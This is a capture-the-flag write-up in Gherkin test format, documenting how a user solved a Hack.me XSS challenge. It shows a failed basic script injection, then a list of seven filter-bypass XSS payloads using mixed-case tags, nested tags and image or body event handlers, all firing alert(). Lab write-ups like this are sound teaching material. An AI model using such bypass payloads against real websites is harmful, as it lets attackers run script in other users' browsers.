## Version 2.0
## language: en

Feature: CHALLENGE-Hack.me
  Site:
    Hack.me
  Category:
    CHALLENGE
  User:
    slayfer1112
  Goal:
    Make a 'XSS'

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Windows OS      | 10            |
    | Chrome          | 79.0.3945.130 |
  Machine information:
    Given I am accessing to the website
    Then I start the virtual machine on the website
    And The website have a field to type anything

  Scenario: Fail:Write-a-normal-script
    Given I can type anything and the web adds the word
    When I see that I can inject HTML like "<b>HMTL</b>"
    Then I see that the text is added with the style [evidence](img1)
    And I try to inject a script with "<script>alert('XSS')</script>"
    When I press the submit button
    Then I see the response, but the script is didn't execute [evidence](img2)
    And I fail to get the flag

  Scenario: Success:Inspect-sources-to-see-the-script
    Given I know that I can inject HTML
    Then I need to make a 'XSS'
    And The field scape the tags '<script>' and '</script>'
    When I want to make a 'XSS' and think a way to avoid the scape
    Then I think a lot of ways to avoid the scape
    """
    1| <ScRiPt>alert('XSS')</sCrIpT>
    2| <scr<script>ipt>alert('XSS')</scr</script>ipt>
    3| <img src='<Link of an image>' onload="<script>alert('XSS')</script>" >
    4| <img src='<Bad Link>' onerror="<script>alert('XSS')</script>" >
    5| <img src='<Link of an image>' onclick="<script>alert('XSS')</script>" >
    6| <body onload="alert('XSS')">
    7| <img src='<Link of an image>'
          onmouseover="<script>alert('XSS')</script>" >
    """
    And I try each one in the field
    When I press the submit button
    Then I see the alert [evidence](img3)
    And I get the flag
